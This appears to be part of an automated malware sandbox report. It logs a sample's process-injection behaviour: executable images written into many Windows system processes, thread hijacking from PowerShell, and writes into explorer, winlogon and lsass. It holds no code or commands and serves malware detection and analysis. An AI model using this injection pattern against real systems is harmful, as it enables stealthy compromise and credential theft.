                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10B60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2256CFB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2C00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E4E5CC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 282093A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C891080000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF983B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1924DB90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2FB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 880000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: F60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EA0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2E90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2EF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E10000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2B70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1590000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 8E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: EC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: CF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 620000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2990000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 29F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2F20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2DC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 670000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1470000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 15C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D40000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D10000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2970000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 26A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 10E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2380000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2BC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 930000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 23A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1150000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D30000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1130000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D50000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A20000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: D60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: FB0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 600000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: C80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1460000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: DC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 11A0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: E70000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 7B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2C60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1290000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 9F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2230000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2A90000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 1170000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: 2880000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\dKebKZgigOAbgNgFBLNtTWhkdeLPOdjMLwmFWsvxeNtGIBU\ErfkvradUxWFZpEjB.exe base: B00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\KrnlSetupSus.exe base: 1B7C0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2153E9B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2C14A960000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1BC83280000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE000000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28FAE2E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25C9D520000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB00000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 180CBB30000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2BC5FFD0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCC60000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\schtasks.exe base: 1E9DCD80000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 25FC3320000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19C14ED0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: unknown base: 1E9DD5F0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WerFault.exe base: 180F6450000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B9973D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 213A4CC0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 20DF5510000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FA39650000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1FB8E0E0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 5D0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 900000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 1B0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\ProgramData\ntoskrnl.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16DF0000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 25A16E20000 value starts with: 4D5AJump to behavior
                              Injects code into the Windows Explorer (explorer.exe)
                              Source: C:\Windows\System32\dllhost.exeMemory written: PID: 4084 base: 7F80000 value: 4DJump to behavior
                              Modifies the context of a thread in another process (thread injection)
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 7680Jump to behavior
                              Writes to foreign memory regions
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140001000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140004000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140006000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140007000Jump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: C91140A010Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1550000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22382770000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000Jump to behavior
                              Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000Jump to behavior
